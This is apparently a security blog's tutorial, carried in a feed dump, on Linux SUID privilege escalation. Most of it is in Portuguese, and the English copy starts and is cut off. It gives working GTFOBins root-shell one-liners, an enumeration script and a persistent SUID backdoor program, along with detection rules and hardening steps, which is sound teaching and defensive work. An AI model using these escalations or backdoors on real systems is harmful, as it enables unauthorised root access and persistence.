Linux podem ser usados como arma para escalonamento de privilégios usando técnicas do GTFOBins e scripts de enumeração customizados.Tue, 14 Jan 2025 00:00:00 GMT<h2 id="o-que-é-suid">O que é SUID?</h2> <p>O bit <strong>SUID (Set User ID)</strong> é uma permissão especial do Linux que faz com que um executável rode com os <strong>privilégios do dono do arquivo</strong> em vez do usuário que o invocou.</p> <p>Quando um binário cujo dono é <code>root</code> possui o bit SUID ativado, qualquer usuário que o execute ganha acesso temporário em nível de root pela duração daquele processo. Isso é intencional para binários como <code>/usr/bin/passwd</code> — mas se torna um vetor crítico de ataque quando encontrado em binários inesperados.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Exemplo de permissão — o 's' na posição de execução do dono = SUID ativado</span></span> <span class="line"><span style="color:#61AFEF">-rwsr-xr-x</span><span style="color:#D19A66"> 1</span><span style="color:#98C379"> root</span><span style="color:#98C379"> root</span><span style="color:#D19A66"> 67816</span><span style="color:#98C379"> Jan</span><span style="color:#D19A66"> 5</span><span style="color:#98C379"> 12:00</span><span style="color:#98C379"> /usr/bin/passwd</span></span></code></pre> <blockquote> <p><strong>MITRE ATT&#x26;CK:</strong> Esta técnica é mapeada como <a href="https://attack.mitre.org/techniques/T1548/001/">T1548.001 — Setuid and Setgid</a> sob a tática de Escalonamento de Privilégios (Privilege Escalation - TA0004).</p> </blockquote> <hr> <h2 id="passo-1--enumerar-binários-suid">Passo 1 — Enumerar Binários SUID</h2> <p>O primeiro passo é encontrar todos os binários com SUID habilitado no sistema.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Encontra todos os binários SUID (suprime erros de permissão negada)</span></span> <span class="line"><span style="color:#61AFEF">find</span><span style="color:#98C379"> /</span><span style="color:#D19A66"> -perm</span><span style="color:#D19A66"> -u=s</span><span style="color:#D19A66"> -type</span><span style="color:#98C379"> f</span><span style="color:#ABB2BF"> 2></span><span style="color:#98C379">/dev/null</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Limita a busca a caminhos comuns de binários para maior velocidade</span></span> <span class="line"><span style="color:#61AFEF">find</span><span style="color:#98C379"> /usr</span><span style="color:#98C379"> /bin</span><span style="color:#98C379"> /sbin</span><span style="color:#98C379"> /opt</span><span style="color:#98C379"> /home</span><span style="color:#D19A66"> -perm</span><span style="color:#D19A66"> -u=s</span><span style="color:#D19A66"> -type</span><span style="color:#98C379"> f</span><span style="color:#ABB2BF"> 2></span><span style="color:#98C379">/dev/null</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Também checa binários SGID (roda como dono do grupo)</span></span> <span class="line"><span style="color:#61AFEF">find</span><span style="color:#98C379"> /</span><span style="color:#D19A66"> -perm</span><span style="color:#D19A66"> -g=s</span><span style="color:#D19A66"> -type</span><span style="color:#98C379"> f</span><span style="color:#ABB2BF"> 2></span><span style="color:#98C379">/dev/null</span></span></code></pre> <p>Um sistema limpo retornará uma lista curta e previsível. Procure por qualquer coisa <strong>incomum</strong> — caminhos não padrão, scripts customizados, ou ferramentas de desenvolvimento.</p> <hr> <h2 id="passo-2--cruzamento-de-referência-com-o-gtfobins">Passo 2 — Cruzamento de Referência com o GTFOBins</h2> <p>O <a href="https://gtfobins.github.io/">GTFOBins</a> é a referência definitiva para binários Unix que podem ser abusados quando possuem permissões elevadas.</p> <h3 id="find">find</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Verifica se o SUID está ativado</span></span> <span class="line"><span style="color:#61AFEF">ls</span><span style="color:#D19A66"> -la</span><span style="color:#ABB2BF"> $(</span><span style="color:#56B6C2">which</span><span style="color:#98C379"> find</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># -rwsr-xr-x 1 root root 204112 ... /usr/bin/find</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Exploração — spawna uma shell root</span></span> <span class="line"><span style="color:#61AFEF">find</span><span style="color:#98C379"> .</span><span style="color:#D19A66"> -exec</span><span style="color:#98C379"> /bin/sh</span><span style="color:#D19A66"> -p</span><span style="color:#56B6C2"> \;</span><span style="color:#D19A66"> -quit</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Verifica o escalonamento</span></span> <span class="line"><span style="color:#61AFEF">whoami</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># root</span></span></code></pre> <p>A flag <code>-p</code> é crítica — ela diz ao <code>sh</code> para <strong>preservar o UID efetivo</strong> em vez de descartá-lo.</p> <h3 id="vim--vi">vim / vi</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Checa</span></span> <span class="line"><span style="color:#61AFEF">ls</span><span style="color:#D19A66"> -la</span><span style="color:#ABB2BF"> $(</span><span style="color:#56B6C2">which</span><span style="color:#98C379"> vim</span><span style="color:#ABB2BF">)</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Método 1: via extensão Python3</span></span> <span class="line"><span style="color:#61AFEF">vim</span><span style="color:#D19A66"> -c</span><span style="color:#98C379"> ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Método 2: spawn direto de shell</span></span> <span class="line"><span style="color:#61AFEF">vim</span><span style="color:#D19A66"> -c</span><span style="color:#98C379"> ':!sh -p'</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Método 3: via escape de shell no modo normal (dentro do vim)</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># :set shell=/bin/sh</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># :shell</span></span></code></pre> <h3 id="python--python3">python / python3</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">python3</span><span style="color:#D19A66"> -c</span><span style="color:#98C379"> 'import os; os.execl("/bin/sh", "sh", "-p")'</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Também funciona no python2 mais antigo</span></span> <span class="line"><span style="color:#61AFEF">python</span><span style="color:#D19A66"> -c</span><span style="color:#98C379"> 'import os; os.execl("/bin/sh", "sh", "-p")'</span></span></code></pre> <h3 id="bash">bash</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Apenas explorável se o SUID estiver no próprio bash (raro, mas acontece em CTFs)</span></span> <span class="line"><span style="color:#61AFEF">ls</span><span style="color:#D19A66"> -la</span><span style="color:#98C379"> /bin/bash</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># -rwsr-xr-x 1 root root ...</span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">bash</span><span style="color:#D19A66"> -p</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># bash-5.1# whoami</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># root</span></span></code></pre> <h3 id="nmap-versões-legacy--535">nmap (versões legacy &#x3C; 5.35)</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Modo interativo disponível em versões antigas do nmap</span></span> <span class="line"><span style="color:#61AFEF">nmap</span><span style="color:#D19A66"> --interactive</span></span> <span class="line"><span style="color:#61AFEF">nmap</span><span style="color:#ABB2BF">> </span><span style="color:#98C379">!sh</span></span></code></pre> <h3 id="tar">tar</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">tar</span><span style="color:#D19A66"> -cf</span><span style="color:#98C379"> /dev/null</span><span style="color:#98C379"> /dev/null</span><span style="color:#D19A66"> --checkpoint=1</span><span style="color:#D19A66"> --checkpoint-action=exec=/bin/sh</span></span></code></pre> <h3 id="perl">perl</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">perl</span><span style="color:#D19A66"> -e</span><span style="color:#98C379"> 'exec "/bin/sh";'</span></span></code></pre> <h3 id="awk">awk</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">awk</span><span style="color:#98C379"> 'BEGIN {system("/bin/sh -p")}'</span></span></code></pre> <h3 id="less--more">less / more</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Dentro do pager less/more</span></span> <span class="line"><span style="color:#61AFEF">less</span><span style="color:#98C379"> /etc/passwd</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Então digite:</span></span> <span class="line"><span style="color:#ABB2BF">!</span><span style="color:#61AFEF">/bin/sh</span></span></code></pre> <hr> <h2 id="passo-3--script-de-enumeração-automatizada">Passo 3 — Script de Enumeração Automatizada</h2> <p>O script a seguir cruza a referência de binários SUID descobertos com uma lista de conhecidos por serem exploráveis e gera os alvos priorizados.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic">#!/usr/bin/env bash</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># suid_hunter.sh — Enumeração e triagem de SUID</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Uso: ./suid_hunter.sh</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Autor: r3d/ops | KBM Security</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">RED</span><span style="color:#56B6C2">=</span><span style="color:#98C379">'\033[0;31m'</span></span> <span class="line"><span style="color:#E06C75">YEL</span><span style="color:#56B6C2">=</span><span style="color:#98C379">'\033[0;33m'</span></span> <span class="line"><span style="color:#E06C75">GRN</span><span style="color:#56B6C2">=</span><span style="color:#98C379">'\033[0;32m'</span></span> <span class="line"><span style="color:#E06C75">BLU</span><span style="color:#56B6C2">=</span><span style="color:#98C379">'\033[0;34m'</span></span> <span class="line"><span style="color:#E06C75">RST</span><span style="color:#56B6C2">=</span><span style="color:#98C379">'\033[0m'</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">KNOWN_EXPLOITABLE</span><span style="color:#56B6C2">=</span><span style="color:#98C379">"nmap|vim|vi|find|python|python3|bash|perl|ruby|tar|wget|curl"</span></span> <span class="line"><span style="color:#E06C75">KNOWN_EXPLOITABLE</span><span style="color:#C678DD">+=</span><span style="color:#98C379">"|nc|netcat|awk|less|more|man|ftp|gdb|strace|ltrace|tclsh"</span></span> <span class="line"><span style="color:#E06C75">KNOWN_EXPLOITABLE</span><span style="color:#C678DD">+=</span><span style="color:#98C379">"|env|expect|lua|php|ruby|node|git|zip|unzip|7z|aria2c"</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#D19A66"> -e</span><span style="color:#98C379"> "${</span><span style="color:#E06C75">BLU</span><span style="color:#98C379">}[*] SUID Binary Hunter — r3d/ops${</span><span style="color:#E06C75">RST</span><span style="color:#98C379">}"</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#D19A66"> -e</span><span style="color:#98C379"> "${</span><span style="color:#E06C75">BLU</span><span style="color:#98C379">}[*] Escaneando o filesystem...${</span><span style="color:#E06C75">RST</span><span style="color:#98C379">}\n"</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">BINS</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$(</span><span style="color:#61AFEF">find</span><span style="color:#98C379"> /</span><span style="color:#D19A66"> -perm</span><span style="color:#D19A66"> -u=s</span><span style="color:#D19A66"> -type</span><span style="color:#98C379"> f</span><span style="color:#ABB2BF"> 2></span><span style="color:#98C379">/dev/null</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75">TOTAL</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$(</span><span style="color:#56B6C2">echo</span><span style="color:#98C379"> "</span><span style="color:#E06C75">$BINS</span><span style="color:#98C379">"</span><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">wc</span><span style="color:#D19A66"> -l</span><span style="color:#ABB2BF">)</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#D19A66"> -e</span><span style="color:#98C379"> "[*] Encontrados ${</span><span style="color:#E06C75">YEL</span><span style="color:#98C379">}${</span><span style="color:#E06C75">TOTAL</span><span style="color:#98C379">}${</span><span style="color:#E06C75">RST</span><span style="color:#98C379">} binários SUID\n"</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#D19A66"> -e</span><span style="color:#98C379"> "[*] Checando contra a lista de exploráveis conhecidos...\n"</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">HIT</span><span style="color:#56B6C2">=</span><span style="color:#98C379">0</span></span> <span class="line"><span style="color:#C678DD">while</span><span style="color:#E06C75"> IFS</span><span style="color:#56B6C2">=</span><span style="color:#56B6C2"> read</span><span style="color:#D19A66"> -r</span><span style="color:#98C379"> bin</span><span style="color:#ABB2BF">; </span><span style="color:#C678DD">do</span></span> <span class="line"><span style="color:#E06C75"> name</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$(</span><span style="color:#61AFEF">basename</span><span style="color:#98C379"> "</span><span style="color:#E06C75">$bin</span><span style="color:#98C379">"</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75"> owner</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$(</span><span style="color:#56B6C2">stat</span><span style="color:#D19A66"> -c</span><span style="color:#98C379"> '%U'</span><span style="color:#98C379"> "</span><span style="color:#E06C75">$bin</span><span style="color:#98C379">"</span><span style="color:#ABB2BF"> 2></span><span style="color:#98C379">/dev/null</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75"> perms</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$(</span><span style="color:#56B6C2">stat</span><span style="color:#D19A66"> -c</span><span style="color:#98C379"> '%A'</span><span style="color:#98C379"> "</span><span style="color:#E06C75">$bin</span><span style="color:#98C379">"</span><span style="color:#ABB2BF"> 2></span><span style="color:#98C379">/dev/null</span><span style="color:#ABB2BF">)</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD"> if</span><span style="color:#56B6C2"> echo</span><span style="color:#98C379"> "</span><span style="color:#E06C75">$name</span><span style="color:#98C379">"</span><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">grep</span><span style="color:#D19A66"> -qiE</span><span style="color:#98C379"> "</span><span style="color:#E06C75">$KNOWN_EXPLOITABLE</span><span style="color:#98C379">"</span><span style="color:#ABB2BF">; </span><span style="color:#C678DD">then</span></span> <span class="line"><span style="color:#56B6C2"> echo</span><span style="color:#D19A66"> -e</span><span style="color:#98C379"> " ${</span><span style="color:#E06C75">RED</span><span style="color:#98C379">}[!!!] EXPLORÁVEL:${</span><span style="color:#E06C75">RST</span><span style="color:#98C379">} </span><span style="color:#E06C75">$bin</span><span style="color:#98C379">"</span></span> <span class="line"><span style="color:#56B6C2"> echo</span><span style="color:#D19A66"> -e</span><span style="color:#98C379"> " Dono: ${</span><span style="color:#E06C75">YEL</span><span style="color:#98C379">}${</span><span style="color:#E06C75">owner</span><span style="color:#98C379">}${</span><span style="color:#E06C75">RST</span><span style="color:#98C379">} | Perm: ${</span><span style="color:#E06C75">perms</span><span style="color:#98C379">}"</span></span> <span class="line"><span style="color:#56B6C2"> echo</span><span style="color:#D19A66"> -e</span><span style="color:#98C379"> " GTFOBins: ${</span><span style="color:#E06C75">BLU</span><span style="color:#98C379">}https://gtfobins.github.io/gtfobins/${</span><span style="color:#E06C75">name</span><span style="color:#98C379">}/#suid${</span><span style="color:#E06C75">RST</span><span style="color:#98C379">}\n"</span></span> <span class="line"><span style="color:#E06C75"> HIT</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$((</span><span style="color:#61AFEF">HIT</span><span style="color:#98C379"> +</span><span style="color:#D19A66"> 1</span><span style="color:#ABB2BF">))</span></span> <span class="line"><span style="color:#C678DD"> else</span></span> <span class="line"><span style="color:#56B6C2"> echo</span><span style="color:#D19A66"> -e</span><span style="color:#98C379"> " ${</span><span style="color:#E06C75">GRN</span><span style="color:#98C379">}[ok]${</span><span style="color:#E06C75">RST</span><span style="color:#98C379">} </span><span style="color:#E06C75">$bin</span><span style="color:#98C379"> ${</span><span style="color:#E06C75">BLU</span><span style="color:#98C379">}(${</span><span style="color:#E06C75">owner</span><span style="color:#98C379">})${</span><span style="color:#E06C75">RST</span><span style="color:#98C379">}"</span></span> <span class="line"><span style="color:#C678DD"> fi</span></span> <span class="line"><span style="color:#C678DD">done</span><span style="color:#ABB2BF"> &#x3C;&#x3C;&#x3C; </span><span style="color:#98C379">"</span><span style="color:#E06C75">$BINS</span><span style="color:#98C379">"</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#D19A66"> -e</span><span style="color:#98C379"> "\n[*] Resumo: ${</span><span style="color:#E06C75">RED</span><span style="color:#98C379">}${</span><span style="color:#E06C75">HIT</span><span style="color:#98C379">} alvo(s) em potencial${</span><span style="color:#E06C75">RST</span><span style="color:#98C379">} de ${</span><span style="color:#E06C75">TOTAL</span><span style="color:#98C379">} binários SUID no total"</span></span></code></pre> <hr> <h2 id="passo-4--escrevendo-um-backdoor-suid-customizado-cenário-de-lab">Passo 4 — Escrevendo um Backdoor SUID Customizado (Cenário de Lab)</h2> <p>Em operações de red team autorizadas, você pode precisar plantar um shell SUID persistente para acesso pós-exploração.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Como root — compila um wrapper setuid mínimo para a shell</span></span> <span class="line"><span style="color:#61AFEF">cat</span><span style="color:#ABB2BF"> > </span><span style="color:#98C379">/tmp/rootshell.c</span><span style="color:#ABB2BF"> &#x3C;&#x3C; </span><span style="color:#ABB2BF">'EOF'</span></span> <span class="line"><span style="color:#98C379">#include &#x3C;stdio.h></span></span> <span class="line"><span style="color:#98C379">#include &#x3C;unistd.h></span></span> <span class="line"></span> <span class="line"><span style="color:#98C379">int main() {</span></span> <span class="line"><span style="color:#98C379"> setuid(0);</span></span> <span class="line"><span style="color:#98C379"> setgid(0);</span></span> <span class="line"><span style="color:#98C379"> execl("/bin/bash", "bash", "-p", NULL);</span></span> <span class="line"><span style="color:#98C379"> return 0;</span></span> <span class="line"><span style="color:#98C379">}</span></span> <span class="line"><span style="color:#ABB2BF">EOF</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Compila e seta o SUID</span></span> <span class="line"><span style="color:#61AFEF">gcc</span><span style="color:#98C379"> /tmp/rootshell.c</span><span style="color:#D19A66"> -o</span><span style="color:#98C379"> /tmp/rootshell</span></span> <span class="line"><span style="color:#61AFEF">chmod</span><span style="color:#98C379"> u+s</span><span style="color:#98C379"> /tmp/rootshell</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Um usuário de baixo privilégio agora pode chamá-lo</span></span> <span class="line"><span style="color:#61AFEF">/tmp/rootshell</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># bash-5.1# whoami</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># root</span></span></code></pre> <blockquote> <p><strong>PERIGO:</strong> Nunca faça deploy de backdoors SUID em sistemas de produção ou sem autorização explícita por escrito. Isso é apenas para ambientes de laboratório autorizados.</p> </blockquote> <hr> <h2 id="detecção--mitigação">Detecção &#x26; Mitigação</h2> <h3 id="detecções-do-blue-team">Detecções do Blue Team</h3> <table><thead><tr><th>Indicador</th><th>Fonte de Dados</th><th>Lógica da Regra</th></tr></thead><tbody><tr><td>Novo binário SUID criado</td><td>auditd / inotify</td><td><code>find / -newer /tmp -perm -4000</code></td></tr><tr><td>Binário SUID executa shell</td><td>auditd execve</td><td>parent=suid_binary, child=/bin/sh</td></tr><tr><td>Dono SUID inesperado</td><td>file integrity</td><td>owner=root AND path NOT IN baseline</td></tr><tr><td>Flag <code>-p</code> passada ao shell</td><td>process args</td><td><code>sh -p</code> OR <code>bash -p</code> in cmdline</td></tr></tbody></table> <h3 id="comandos-de-hardening">Comandos de Hardening</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Audita todos os binários SUID — salva uma baseline</span></span> <span class="line"><span style="color:#61AFEF">find</span><span style="color:#98C379"> /</span><span style="color:#D19A66"> -perm</span><span style="color:#D19A66"> -4000</span><span style="color:#D19A66"> -type</span><span style="color:#98C379"> f</span><span style="color:#ABB2BF"> 2></span><span style="color:#98C379">/dev/null</span><span style="color:#ABB2BF"> > </span><span style="color:#98C379">/root/suid_baseline.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Remove o SUID de um binário específico</span></span> <span class="line"><span style="color:#61AFEF">chmod</span><span style="color:#98C379"> u-s</span><span style="color:#98C379"> /caminho/para/binario</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Monta partições com nosuid para prevenir SUID naqueles filesystems</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Em /etc/fstab:</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># /dev/sdb1 /data ext4 defaults,nosuid,noexec 0 0</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Enforcement de profile do AppArmor</span></span> <span class="line"><span style="color:#61AFEF">aa-enforce</span><span style="color:#98C379"> /usr/bin/find</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Verifica a integridade do binário contra o package manager</span></span> <span class="line"><span style="color:#61AFEF">dpkg</span><span style="color:#D19A66"> --verify</span><span style="color:#7F848E;font-style:italic"> # Debian/Ubuntu</span></span> <span class="line"><span style="color:#61AFEF">rpm</span><span style="color:#D19A66"> -Va</span><span style="color:#7F848E;font-style:italic"> # RHEL/CentOS</span></span></code></pre> <h3 id="regras-de-monitoramento-recomendadas-auditd">Regras de Monitoramento Recomendadas (auditd)</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># /etc/audit/rules.d/suid.rules</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Monitora a execução de binário SUID</span></span> <span class="line"><span style="color:#61AFEF">-a</span><span style="color:#98C379"> always,exit</span><span style="color:#D19A66"> -F</span><span style="color:#98C379"> arch=b64</span><span style="color:#D19A66"> -S</span><span style="color:#98C379"> execve</span><span style="color:#D19A66"> -F</span><span style="color:#98C379"> euid=</span><span style="color:#D19A66">0</span><span style="color:#D19A66"> -F</span><span style="color:#98C379"> aui</span><span style="color:#ABB2BF">d></span><span style="color:#98C379">=</span><span style="color:#D19A66">1000</span><span style="color:#D19A66"> -k</span><span style="color:#98C379"> suid_exec</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Monitora chmod/chown mudando o bit SUID</span></span> <span class="line"><span style="color:#61AFEF">-a</span><span style="color:#98C379"> always,exit</span><span style="color:#D19A66"> -F</span><span style="color:#98C379"> arch=b64</span><span style="color:#D19A66"> -S</span><span style="color:#98C379"> chmod</span><span style="color:#D19A66"> -S</span><span style="color:#98C379"> fchmod</span><span style="color:#D19A66"> -S</span><span style="color:#98C379"> fchmodat</span><span style="color:#D19A66"> -F</span><span style="color:#98C379"> a1=</span><span style="color:#D19A66">04755</span><span style="color:#D19A66"> -k</span><span style="color:#98C379"> suid_create</span></span></code></pre> <hr> <h2 id="setup-de-laboratório">Setup de Laboratório</h2> <p>Para praticar essas técnicas de forma segura, suba uma VM vulnerável:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Vagrant — box Linux intencionalmente vulnerável</span></span> <span class="line"><span style="color:#61AFEF">vagrant</span><span style="color:#98C379"> init</span><span style="color:#98C379"> bento/ubuntu-22.04</span></span> <span class="line"><span style="color:#61AFEF">vagrant</span><span style="color:#98C379"> up</span></span> <span class="line"><span style="color:#61AFEF">vagrant</span><span style="color:#98C379"> ssh</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Configura manualmente um binário vulnerável para prática</span></span> <span class="line"><span style="color:#61AFEF">sudo</span><span style="color:#98C379"> chmod</span><span style="color:#98C379"> u+s</span><span style="color:#98C379"> /usr/bin/find</span></span> <span class="line"><span style="color:#61AFEF">find</span><span style="color:#98C379"> .</span><span style="color:#D19A66"> -exec</span><span style="color:#98C379"> /bin/sh</span><span style="color:#D19A66"> -p</span><span style="color:#56B6C2"> \;</span><span style="color:#D19A66"> -quit</span></span></code></pre> <p>Alternativamente, use plataformas dedicadas:</p> <ul> <li><strong>HackTheBox</strong> — Máquinas de privilege escalation em Linux</li> <li><strong>TryHackMe</strong> — Sala “Linux PrivEsc”</li> <li><strong>VulnHub</strong> — Kioptrix, série Mr. Robot</li> </ul> <hr> <h2 id="resumo">Resumo</h2> <table><thead><tr><th>Binário</th><th>Método de Exploit</th><th>Dificuldade</th></tr></thead><tbody><tr><td><code>find</code></td><td><code>-exec /bin/sh -p</code></td><td>Fácil</td></tr><tr><td><code>python3</code></td><td><code>os.execl("/bin/sh","sh","-p")</code></td><td>Fácil</td></tr><tr><td><code>vim</code></td><td><code>:!sh -p</code></td><td>Fácil</td></tr><tr><td><code>bash</code></td><td><code>bash -p</code></td><td>Fácil</td></tr><tr><td><code>tar</code></td><td><code>--checkpoint-action=exec</code></td><td>Média</td></tr><tr><td><code>nmap</code></td><td><code>--interactive</code> (legacy)</td><td>Média</td></tr><tr><td><code>awk</code></td><td><code>system("/bin/sh")</code></td><td>Fácil</td></tr></tbody></table> <p>A chave para levar disso tudo: <strong>qualquer</strong> binário com SUID ativado que permita execução arbitrária de código ou o spawn de uma shell é um caminho para o root. Sempre enumere binários SUID como parte do seu checklist de escalonamento de privilégios no Linux.</p>redteam@kbmsecurity.com.brprivescsuidlinuxprivescgtfobinssetuidenumerationmediumSUID Abuse — Escalating to Root with Forgotten Binarieshttps://www.kbmsecurity.com.br/blog/post/suid-abuse-linux-en/https://www.kbmsecurity.com.br/blog/post/suid-abuse-linux-en/How misconfigured SUID binaries on Linux can be weaponized for privilege escalation using GTFOBins techniques and custom enumeration scripts.Tue, 14 Jan 2025 00:00:00 GMT<h2 id="what-is-suid">What is SUID?</h2> <p>The <strong>SUID (Set User ID)</strong> bit is a special Linux permission that causes an executable to run with the <strong>privileges of the file owner</strong> instead of the user who invoked it.</p> <p>When a binary owned by <code>root</code> has the SUID bit set, any user who executes it gains temporary root-level access for the duration of that process. This is intentional for binaries such as <code>/usr/bin/passwd</code> — but becomes a critical attack vector when found in unexpected binaries.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Permission example — the &#x26;#x27;s&#x26;#x27; in the owner&#x26;#x27;s execute position = SUID enabled</span></span> <span class="line"><span style="color:#61AFEF">-rwsr-xr-x</span><span style="color:#D19A66"> 1</span><span style="color:#98C379"> root</span><span style="color:#98C379"> root</span><span style="color:#D19A66"> 67816</span><span style="color:#98C379"> Jan</span><span style="color:#D19A66"> 5</span><span style="color:#98C379"> 12:00</span><span style="color:#98C379"> /usr/bin/passwd</span></span></code></pre> <p>> <strong>MITRE ATT&#x26;CK;:</strong> This technique is mapped as <a href="https://attack.mitre.org/techniques/T1548/001/">T1548.001 — Setuid and Setgid</a> under the Privilege Escalation tactic (TA0004).</p> <hr> <h2 id="step-1--enumerate-suid-binaries">Step 1 — Enumerate SUID Binaries</h2> <p>The first step is to find all SUID-enabled binaries on the system.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span 